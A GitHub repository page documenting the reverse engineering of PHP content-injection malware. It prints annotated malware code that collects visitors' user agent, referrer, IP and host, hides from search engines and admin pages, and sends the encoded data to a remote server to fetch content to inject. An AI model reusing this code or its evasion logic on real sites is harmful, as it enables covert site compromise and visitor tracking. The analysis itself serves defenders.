Skip to content


Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

Latest commit


Git stats


Failed to load latest commit information.
Latest commit message
Commit time

Reverse Engineering PHP Malware Content injection

This repository is a result of a Reverse Engineering of PHP Malware that makes Content injection.

The full description can be found in english in (@todo add link here) and in portuguese in (@todo add link here)

Authors of this work (re rev.eng., not the malware):

  • Bernardo Donadio bcdonadio at
  • Emerson Rocha Luiz emerson at

Sample code

/** REVENGNOTE: Do not assume that this malware will have same function names.
 *              even for the same malware.
function day212()
	$a = check212("HTTP_USER_AGENT");
	$b = check212("HTTP_REFERER");
	$c = check212("REMOTE_ADDR");
	$d = check212("HTTP_HOST");
	$e = check212("PHP_SELF");

	/** REVENGNOTE: this next array does nothing here. But was on original code.
	 *    ,, and
	 *              are domains that point (now) for the same working server
	 *              they are used to create content to inject on user code
	$domarr = array(

	/** REVENGNOTE: this is very important. It does NOT inject content on site
	 *              if is a search engine (that could alert site admin of this
	 *              malware, and also does not load on pages that are like
	 *              for administratior interfaces. It also check for a valid
     *              HTTP_REFERER, so sometimes, share a link with a friend will
     *              not work at all, because you need navitate on the site before
     *              Is very likely that most common antivirus agents will maybe
     *              pass this basic check, but remote server will know they
     *              user agent and will return empty content.
	if (($a == "non") or ($c == "non") or ($d == "non") or strrpos(strtolower($e) , "admin") or (preg_match("/" . implode("|", array(
	)) . "/i", strtolower($a)))) {
		$o1 = "";
	else {
		$op = mt_rand(100000, 999999);
		$g4 = $op . "?" . urlencode(urlencode(k34($op, $a) . "." . k34($op, $b) . "." . k34($op, $c) . "." . k34($op, $d) . "." . k34($op, $e)));
		$url = "http://" . cqq(".com") . "/" . $g4;
		$ca1 = en2(@gtd($url) , $op);
		$a1 = @explode("!NF0", $ca1);
		if (sizeof($a1) >= 2) $o1 = $a1[1];
		else $o1 = "";

	return $o1;


This is a reverse-engineering of malicious code found in compromised servers. The use of this code without explicit consent of the owner of the infrastructure constitutes a felony in many countries. Do not use except for educational purposes.


No description, website, or topics provided.






No releases published


No packages published